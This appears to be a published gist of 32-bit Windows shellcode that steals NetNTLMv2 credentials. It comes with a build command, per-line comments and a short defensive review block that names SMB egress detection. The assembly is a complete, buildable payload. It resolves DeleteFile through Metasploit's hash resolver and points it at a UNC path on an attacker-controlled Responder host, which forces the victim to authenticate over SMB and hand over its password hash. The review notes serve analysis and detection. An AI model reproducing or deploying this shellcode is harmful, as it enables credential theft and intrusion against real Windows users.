@EgeBalci
Created June 26, 2019 18:06
NetNTLMv2 stealer shellcode.
;-----------------------------------------------------------------------------;
; Author: Ege Balcı (egebalci[at]pm[dot]me)
; Compatible: All Windows versions with SMBv2/v1
; Version: 1.0 (26 June 2019)
; Size: 185 bytes + strlen(IP) + 1
; Build: nasm -f bin steal_netntlm.asm -o shellcode && xxd -i shellcode
;-----------------------------------------------------------------------------;
;-----------------------------------------------------------------------------;
; Review notes (defensive reading of this listing)
;
; Shape:   32-bit x86, position-independent flat binary. Control flow is
;          linear: resolve api_call -> DeleteFile(UNC path) -> exit thread.
; Effect:  the only "work" is one DeleteFile call on a \\<address>\<share>
;          path. Windows services that path over SMB, so the process opens an
;          outbound SMB session to the hard-coded address and authenticates to
;          it (that authentication exchange is what the title refers to). The
;          file never needs to exist and the call's return value is ignored.
; Detect:  outbound SMB (TCP/445) from a workstation to an address that is not
;          a known file server / domain controller is the observable; blocking
;          SMB at the egress boundary removes the effect entirely.
; Regs:    ebp = address of api_call, live across both "call ebp" sites;
;          ebx = exit-function hash; eax/edx/ecx are scratch (and block_api
;          clobbers what it needs - it preserves nothing for us by contract).
; Stack:   every "call ebp" expects the API hash on top of the stack and the
;          API's arguments beneath it (Metasploit block_api convention). Win32
;          APIs are stdcall and pop their own arguments, so no manual cleanup
;          follows either call.
; Limits:  [BITS 32] - this only executes inside a 32-bit (or WOW64) process;
;          the "All Windows versions" claim in the header should be read with
;          that caveat.
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0] ; Flat binary at origin 0: nothing below uses absolute addresses, only call/pop.
cld ; Clear the direction flag: the included api_call walks names with string loads (lodsb), which need DF=0.
call start ; Pushes the address of the bytes that follow - i.e. the %include'd api_call entry - as a "return address". Nothing ever returns here.
%include "block_api.asm" ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm - Metasploit x86 resolver: looks up an export by (module, function) hash by walking the PEB loader list; called through ebp below.
start: ;
pop ebp ; ebp = &api_call. Every later "call ebp" goes through the hash resolver.
call get_ip ; Pushes the address of the string immediately below; that pushed address is the lpFileName argument for DeleteFile.
db "\\1.1.1.1\x",0 ; Responder IP address (original author's placeholder). NASM double-quoted strings process no escapes, so the bytes are literally \\1.1.1.1\x plus NUL - a UNC path \\<address>\<share>.
get_ip: ;
push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFile" ) - hash on top, argument beneath. Presumably the ANSI export (DeleteFileA) given the byte string; confirm against the hash tool.
call ebp ; DeleteFile("\\1.1.1.1\x"); return value ignored - the SMB connection/authentication attempt is the intended side effect, not the deletion.
exitfunk: ; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm - standard Metasploit exit block, unchanged.
mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user... (kernel32.dll!ExitThread, see the bl check below)
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7 (major version < 6)
jl short goodbye ; Then just call the exit function... (signed compare is fine: AL is a small version number)
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... (0xE0 is the low byte of the ExitThread hash above)
jne short goodbye ;
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: ; We now perform the actual call to the exit function
push byte 0 ; push the exit function parameter (exit code 0)
push ebx ; push the hash of the exit function
call ebp ; call EXITFUNK( 0 ); does not return - the thread ends here.